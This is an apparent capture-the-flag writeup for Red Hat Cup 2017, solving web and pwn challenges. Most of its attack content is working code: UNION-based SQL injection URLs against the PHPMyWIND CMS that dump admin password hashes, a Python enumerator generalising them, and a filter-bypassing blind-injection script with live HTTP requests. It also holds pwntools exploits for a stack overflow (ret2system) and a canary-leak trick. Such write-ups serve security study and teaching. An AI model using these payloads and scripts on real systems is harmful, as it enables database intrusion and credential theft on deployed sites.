红帽杯2017 (Red Hat Cup 2017) writeup

brain(Y)

brainfuck

刮刮乐 (scratch card)

.git leak
106.75.67.7:3080/.git/

后台 (backend)

The hint says the backend password is some day in 2017... 20170505 got straight in... awkward.

PHPMyWIND

From the article http://0day5.com/archives/1146/ we know this CMS has a SQL injection in shoppingcart.php.
Query the database name (in the payloads below, @`'` is a MySQL user variable whose name is a single quote character, which keeps the quotes balanced for naive filters, and /*!50000union*/ is a version-conditional comment that MySQL executes as union):

http://106.75.96.7:3089/shoppingcart.php?a=addshopingcart&typeid=10&goodsid=1 and @`'` /*!50000union*/ select null,null,null,null,null,null,null,null,null,null,SCHEMA_NAME,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from information_schema.SCHEMATA  limit 0,1 --+or @`'` &buynum=1&attrid_1=%E9%BB%91%E8%89%B2&attrid_2=WCDMA

Query the table names:

http://106.75.96.7:3089/shoppingcart.php?a=addshopingcart&typeid=10&goodsid=1 and @`'` /*!50000union*/ select null,null,null,null,null,null,null,null,null,null,TABLE_NAME,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from information_schema.TABLES where TABLE_SCHEMA=0x7068706d7977696e645f6462 limit 0,1 --+or @`'` &buynum=1&attrid_1=%E9%BB%91%E8%89%B2&attrid_2=WCDMA

Query the column names:

http://106.75.96.7:3089/shoppingcart.php?a=addshopingcart&typeid=10&goodsid=1 and @`'` /*!50000union*/ select null,null,null,null,null,null,null,null,null,null,COLUMN_NAME,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from information_schema.COLUMNS where TABLE_NAME=0x706d775f61646d696e limit 0,1 --+or @`'` &buynum=1&attrid_1=%E9%BB%91%E8%89%B2&attrid_2=WCDMA

Query the admin account's password hash:

http://106.75.96.7:3089/shoppingcart.php?a=addshopingcart&typeid=10&goodsid=1 and @`'` /*!50000union*/ select null,null,null,null,null,null,null,null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from pmw_admin  limit 0,1 --+or @`'` &buynum=1&attrid_1=%E9%BB%91%E8%89%B2&attrid_2=WCDMA

After logging in to the backend, the flag file is visible under the template files.
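The four URLs above each fetch a single row (limit 0,1). The script below is an added example, not code from the writeup, from the 0day5 article, or from PHPMyWIND: it generalises the same injection point to walk every row (schemas, tables, columns, hashes) and builds the hex literals that replace quoted strings. The 38-column UNION with the wanted expression in position 11 is my reading of the page's payloads (both are parameters); the page does not show where in the HTML the value is reflected, so the caller passes a fetch_value(url) function that returns the reflected string or None.

```python
"""Union-based enumeration for the PHPMyWIND shoppingcart.php injection.

Added example for this writeup. Assumptions: the target/base URL and the fixed
cart parameters are those printed in the writeup; the UNION has 38 columns and
column 11 is the one the page reflects (change `columns`/`position` if your
column-count probe says otherwise).
"""

BASE = "http://106.75.96.7:3089/shoppingcart.php"          # target from the writeup
# Fixed parameters carried on every request in the writeup (黑色 = "black").
TAIL = "&buynum=1&attrid_1=%E9%BB%91%E8%89%B2&attrid_2=WCDMA"


def hexlit(s):
    """Encode a string as a MySQL hex literal so no quote characters are needed.

    The writeup uses 0x7068706d7977696e645f6462 for 'phpmywind_db'.
    """
    return "0x" + s.encode().hex()


def union_url(expr, source, row, cond="", columns=38, position=11):
    """Build one request that returns row `row` of `select expr from source`.

    @`'` is a user variable whose name is a quote character (keeps quotes
    balanced for naive filters); /*!50000union*/ is executed by MySQL as UNION.
    The select list has `columns` entries, all null except the one at
    `position`, which is where the page reflects data.
    """
    cols = ["null"] * columns
    cols[position - 1] = expr
    where = " where " + cond if cond else ""
    q = ("1 and @`'` /*!50000union*/ select " + ",".join(cols)
         + " from " + source + where + " limit %d,1 --+or @`'` " % row)
    return BASE + "?a=addshopingcart&typeid=10&goodsid=" + q + TAIL


def enumerate_rows(fetch_value, expr, source, cond="", max_rows=200):
    """Walk rows 0..max_rows-1 until the page stops reflecting a value."""
    found = []
    for row in range(max_rows):
        value = fetch_value(union_url(expr, source, row, cond))
        if value is None:
            break
        found.append(value)
    return found


def dump_admin_hashes(fetch_value, db="phpmywind_db", table="pmw_admin"):
    """The writeup's four steps chained: schemas, tables, columns, password hashes."""
    schemas = enumerate_rows(fetch_value, "SCHEMA_NAME", "information_schema.SCHEMATA")
    tables = enumerate_rows(fetch_value, "TABLE_NAME", "information_schema.TABLES",
                            "TABLE_SCHEMA=" + hexlit(db))
    columns = enumerate_rows(fetch_value, "COLUMN_NAME", "information_schema.COLUMNS",
                             "TABLE_NAME=" + hexlit(table))
    hashes = enumerate_rows(fetch_value, "password", table)
    return {"schemas": schemas, "tables": tables, "columns": columns, "hashes": hashes}


if __name__ == "__main__":
    # Offline demo with a constructed stand-in for the target (no network).
    fake_db = {"information_schema.SCHEMATA": ["information_schema", "phpmywind_db"]}

    def fake_fetch(url):
        src = url.split(" from ")[1].split(" ")[0]
        i = int(url.split(" limit ")[1].split(",")[0])
        rows = fake_db.get(src, [])
        return rows[i] if i < len(rows) else None

    print(dump_admin_hashes(fake_fetch))
```

For the live target, fetch_value would request the URL and pull the reflected value out of the cart page; plug that in and the loop stops on the first row that comes back empty.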

thinkseeker

http://106.75.117.4:3083/index.php~ exists, a backup file leaking the source:

<?php
error_reporting(0);
$token="e00cf25ad42683b3df678c61f42c6bda";

// Blacklist applied only to $_GET *values*: a few keywords, the comma, the
// space and both quote characters. Comments (/**/), parentheses, = > and &
// are not filtered.
foreach($_GET as $key=>$value){ 
    if (is_array($value)){
        die("Bad input!");
    }
    $p="and|union|where|join|sleep|benchmark|if|sleep|benchmark|,| |\'|\"";
    if(preg_match("/".$p."/is",$value)==1){
        die("inj code!");
    }
}

// parse_str() with no second argument registers every query-string
// parameter as a local variable: ?token=... overwrites the hard-coded
// $token above, and $userid, $password and $infoid come from the URL.
parse_str($_SERVER['QUERY_STRING']);

if($token==md5("admin")){
    $link=@mysql_connect("XXXX","XXXX","XXXX");
    mysql_select_db("XXXX",$link);
    // $userid is concatenated unquoted: the injection point.
    $sql="select * from user where userid = ".$userid;
    $query = mysql_query($sql);
    // Three distinct outcomes (error userid / error password / content)
    // make this a boolean blind oracle.
    if (mysql_num_rows($query) == 1) { 
        $arr = mysql_fetch_array($query);
        if($arr['password'] == $password) {
            // $infoid is concatenated the same way.
            $sql="select * from info where infoid=".$infoid;
            $result=mysql_query($sql);
            $arr = mysql_fetch_array($result);
            if(empty($arr['content'])){
                echo "error sql!";
            }else{
                echo $arr['content'];
            }
        }else{
            echo "error password!";
        }
    }else{
        echo "error userid!";
    }
    mysql_close($link);
}else{
    echo "Bad token!";
}
?>
<html>
    <head>
        <title>web-test</title>
    </head>
    <body>
        <form action="" method="get">
            User ID:<input type="text" name="userid" length="50" /><br>
            Password:<input type="password" name="password" length="50" /><br>
            <input type="submit" value="submit"/>
        </form>
    </body>
</html>

The parameters that have to be pinned down are token, password, userid and infoid.
The token value is:
md5("admin") == 21232f297a57a5a743894a0e4a801fc3
Trying userid=1 turns out to be correct.
Build a payload to extract the password:

http://106.75.117.4:3083/?userid=1%%26%%26ascii(mid(password/**/from/**/%s/**/for/**/1))=%s&password=1&token=21232f297a57a5a743894a0e4a801fc3&infoid=

Run a blind-injection script over it (the %s placeholders and the doubled %%26 are Python string formatting; the request actually sent contains %26, i.e. &&, which is not in the blacklist, while /**/ stands in for the blocked space and mid(... from ... for ...) avoids the blocked comma).
Guessing infoid=1 turns out to be correct.
Build a payload to extract the flag:

http://106.75.117.4:3083/?userid=1%%26%%26ascii(mid((select/**/flag/**/from/**/flag)/**/from/**/%s/**/for/**/1))=%s&password=219d03ad2d752ad2806ea1de18613158&token=21232f297a57a5a743894a0e4a801fc3&infoid=1

Run the blind-injection script again.
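The writeup does not include the blind-injection script it ran. Below is an added example of one, not code from the original page: it builds the same kind of URL as the two payloads above (the token from md5("admin"), %26%26 for &&, /**/ for spaces, mid(x from p for 1) for the comma-free substring) and recovers each character by binary search on > instead of 256 equality probes, which is my change and relies on > not being in the leaked blacklist. The oracle is the page's own behaviour: "error userid!" appears only when the injected comparison is false. The host and the user-1 hash are the values printed in the writeup; the function names are mine.

```python
"""Boolean-based blind SQL injection for the thinkseeker challenge.

Added example; not from the original writeup. Assumes the target and token
from the page, and that '>' passes the filter (it is not in the blacklist).
"""
import urllib.request

BASE = "http://106.75.117.4:3083/"
TOKEN = "21232f297a57a5a743894a0e4a801fc3"   # md5("admin"); overrides $token via parse_str()


def build_url(expr, pos, val, password="1", infoid="", base=BASE):
    """Return the probe URL asking whether ascii(mid(expr from pos for 1)) > val.

    `expr` must itself avoid everything the filter rejects (spaces, commas,
    quotes, and/union/where/join/...); the writeup uses `password` and
    `(select/**/flag/**/from/**/flag)`. %26 is a literal & inside the value,
    so PHP keeps it in $userid instead of starting a new parameter.
    """
    userid = "1%26%26ascii(mid({e}/**/from/**/{p}/**/for/**/1))>{v}".format(
        e=expr, p=pos, v=val)
    return "{b}?userid={u}&password={pw}&token={t}&infoid={i}".format(
        b=base, u=userid, pw=password, t=TOKEN, i=infoid)


def extract(probe, max_len=64):
    """Recover a string one character at a time from a True/False oracle.

    probe(pos, val) answers whether the character at 1-based `pos` has an
    ASCII code greater than `val`. Binary search over 0..127 costs seven
    probes per character; MySQL's ascii('') is 0 past the end, which stops
    the loop.
    """
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if probe(pos, mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out.append(chr(lo))
    return "".join(out)


def http_probe(expr, password="1", infoid="", base=BASE, timeout=10):
    """Build an oracle against the live target (no request is made here).

    The comparison is true exactly when `userid = 1 && <cond>` still returns
    one row. With a wrong password that branch prints "error password!",
    with the right password and infoid=1 it prints the info row; only a
    false comparison yields "error userid!".
    """
    def probe(pos, val):
        url = build_url(expr, pos, val, password, infoid, base)
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return b"error userid!" not in resp.read()
    return probe


if __name__ == "__main__":
    # Stage 1: user 1's password hash; stage 2: the flag, authenticated with it.
    pw = extract(http_probe("password"))
    print("password =", pw)
    flag_probe = http_probe("(select/**/flag/**/from/**/flag)", password=pw, infoid="1")
    print("flag =", extract(flag_probe))
```

Because the script only needs the "error userid!" marker, the same extract() works for any expression that fits the filter; swap `probe` for a function that parses a local copy of the challenge if you want to test the search logic without hitting the target.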

pwn1

A simple stack overflow; just build a ROP chain.
exp

from pwn import *

e = ELF('./pwn1_c1d0173e20a08feff046c8433f53fd37')
p = remote('106.75.93.221', 10000)

sys_addr = p32(e.symbols['system'])      # system() from the binary's symbols (no PIE, fixed address)
ret_addr = b'\x12\x12\x12\x12'           # fake return address for system(); never reached
sh_addr = p32(next(e.search(b'sh')))     # first "sh" string in the binary, used as system()'s argument

# 52 bytes fill the buffer up to the saved return address, then the
# 32-bit ret2func layout: system | ret | &"sh".
payload = b'A' * 52 + sys_addr + ret_addr + sh_addr
p.sendline(payload)
p.interactive()
p.close()

pwn5

Also a simple stack overflow (I can only do stack overflows... [facepalm]).
But the canary is enabled.
The flag has clearly already been read into memory, though. When __stack_chk_fail() fires it prints the current program name, so it is enough to overwrite the argv[0] pointer with the flag's address. (This relies on glibc older than 2.26; from 2.26 on the stack-smashing message no longer includes the program name.)
exp

from pwn import *

e = ELF('./pwnsss_d1b5b1011fc0ef9b3de9cb0ad261295a')
p = remote('106.75.93.221', 10003)

# 292 bytes of padding reach the argv[0] slot on the stack; overwrite it with
# the address the flag was read into (0x804a080, in .bss: no PIE). The canary
# is clobbered on the way, so __stack_chk_fail() runs and glibc prints
# "*** stack smashing detected ***: <argv[0]> terminated", i.e. the flag.
payload = b'A' * 292 + p32(0x804a080)
p.sendline(payload)
p.interactive()
p.close()